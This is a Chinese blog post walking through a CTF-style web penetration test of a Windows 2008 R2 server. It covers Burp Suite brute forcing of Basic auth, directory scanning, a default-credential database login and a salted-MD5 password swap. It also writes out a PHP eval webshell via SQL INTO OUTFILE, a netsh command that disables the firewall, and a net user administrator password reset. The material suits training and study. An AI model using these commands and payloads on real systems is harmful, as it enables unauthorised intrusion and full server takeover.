win2008R2 web渗透测试 经典案例分析

a.前台

b.后台

c.提权

websall BUrpsuit使用方法,哈希值,base64,木马,小马,大马,蚁剑,冰蝎,哥斯拉

1.先主动扫描目的ip,搜集相关信息,查询相关服务端口,操作系统等

image-20231208141447099

2.因为对方开了80web服务器端口,所以登录对应的web服务器

image-20231208142038749

3.因为不知道用户名和密码,所以我们进行暴力破解,此时我们需要设置网络代理设置

image-20231208142456568

image-20231208142526884

4.先关闭代理,进入网站,随便输入用户名和密码,再打开代理,以获取拦截的数据包

image-20231208142858858

5.进入BUrpsuit,查看刚刚拦截的数据包,发现所需的信息被加密(由于这个认证是在进入网站之前弹出的,所以这是个典型的http协议的认证)

image-20231208143056847

6、我们既然已知这个编码类型为base64,所以我们复制下来先去Decoder窗口,右边第一个中的base64解码

image-20231208143512421

7、根据上一步解码操作知道,用户名和密码的组合是 :;编码类型是base64,所以我们就可以直接进行爆破,将拦截的数据包ctrl +I 传来,选中需要爆破的字段作为变量,攻击方式选择siniper

image-20231208144136264

image-20231208144004760

8、在进行爆破的前提,由于抓取的时候数据都是被编码过的,所以我们发过去的数据也要进行编码

image-20231208145301819

image-20231208145607048

image-20231208145611402

image-20231208145741820

image-20231208150023366

image-20231208150519630

9、将成功获取的编码重新复制回去解码成功获取信息

image-20231208150650418

10、成功进入获取第一个key

image-20231208150828006

image-20231208150946864

11、然后我们进行页面扫描,也就是目录扫描,工具有很多,BUrpsuit也可以

image-20231208151302953

image-20231208151508906

image-20231208151716844

或者是用铸剑直接扫描

image-20231208152012879

扫描成功,找文件结尾为php和dr,dr是目录的意思

image-20231208152051423

12、重新输入表头,进入管理页面

image-20231208152350394

13、发现这个因为有验证码不好爆破,所以我们去刚刚扫描出来的数据库管理页面看

image-20231208153736410

image-20231208153802366

14、一般数据库有默认的名字root,所以我们直接爆破密码即可,得到密码也是root,输入进入

image-20231208154114834

14、破解

image-20231208154839121

image-20231208154851694

image-20231208154856996

15、一般哈希值为32或者40位,但这只有20位,这说明这个密码进行了MD5加盐处理,也就是前面减了五位,后面减了7位,由于哈希处理过的值具有单向性不可逆,因此只能比对撞库,所以这就需要库的容量要大,此时需要www.cmd5.com这个网站破译

image-20231208155800670

16、不过考试时机器不能上网,那我们就直接改数据库里面的密码,创建一个原密码为123456的32位哈希值,去头五尾七取中间2位放入其中,这时我们发过来推,用户输入123456的密码时,这个php的代码会把它算成MD5的哈希值为32为,然后系统录入进去取中间的20位,如此一来我们就就可以偷梁换柱(也就是说,第一步用户写明文,第二步通过此明文换算成32位哈希值,第三步去前五后七取中间二十得最终结果)

image-20231208161500090

17.输入我们更改的密码,进入后台找key

image-20231208162257617

image-20231208164740751

image-20231208165407255

这是一条SQL语句,用于将指定的内容写入到指定的文件中。具体解释如下:

'select':表示执行一个查询操作。
"<?php eval($ POST[a]):?>:"这是一个PHP代码片段,其中eval()函数用于执行传递进来的字符串作为PHP代码。在这里,$ POST[a]是一个变量,表示从客户端传递过来的参数。这行代码的意思是将传递进来的参数作为PHP代码进行执行。
"into outfile 'c:/phpstudy/www/muma.php'":表示将查询结果写入到指定的文件中。
在这里,1"c:/phpstudy/www/muma.php"是目标文件的路径。
综合起来,这条SQL语句的意思是将<?php eval($ POST[a]):?>这段PHP代码写入到c:/phpstudy/www/muma.php文件中。这样,当有人访问muma.php时,其中的PHP代码将会被执行。请注意,这种操作具有潜在的安全风险,因为它可以允许执行任意的PHP代码。

image-20231212140914638

image-20231212141204824

image-20231208165427733

18,、web工具的使用和构造eva函数,通过工具,直接按构造语句,这些语句将被eva函数执行,最终达到控制操作系统,找到第二个key

image-20231212142346656

image-20231212143811756

image-20231212143820941

刷新页面到网站按F12,浏览器访问页面是会默认携带一个认证字段

image-20231212144029019

image-20231212144529730

image-20231212144744053

添加成功后右键文件管理

image-20231212144911548

image-20231212145055077

19、按照比赛找第三个key一定获得最高权限,,题目已经告诉我们key在终端桌面,意味着我们需要进入管理员的桌面,此时我们木马,webshell,所以可以直接右键虚拟终端,但管理员桌面要通过图形化进去,如果要通过图形化进去,就必须能连接这个服务器的图形化,此刻我们让服务器开3389端口打开远程桌面协议

image-20231212150741393

image-20231212150748114

image-20231212150756351

执行Windows程序:3389.bat

image-20231212151814200

顺便关一下服务器的防火墙:netsh advfirewall set allprofiles state off

image-20231212151908863

打开远程桌面:mstsc.exe

image-20231212152225006

image-20231212152234600

因为我们不知道密码,而且我们此时又在管理员下,直接 改管理员密码;net user administrator ruitong

image-20231212152115663

再次启动打开远程桌面

image-20231212153228709

登录成功

image-20231212153335477

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值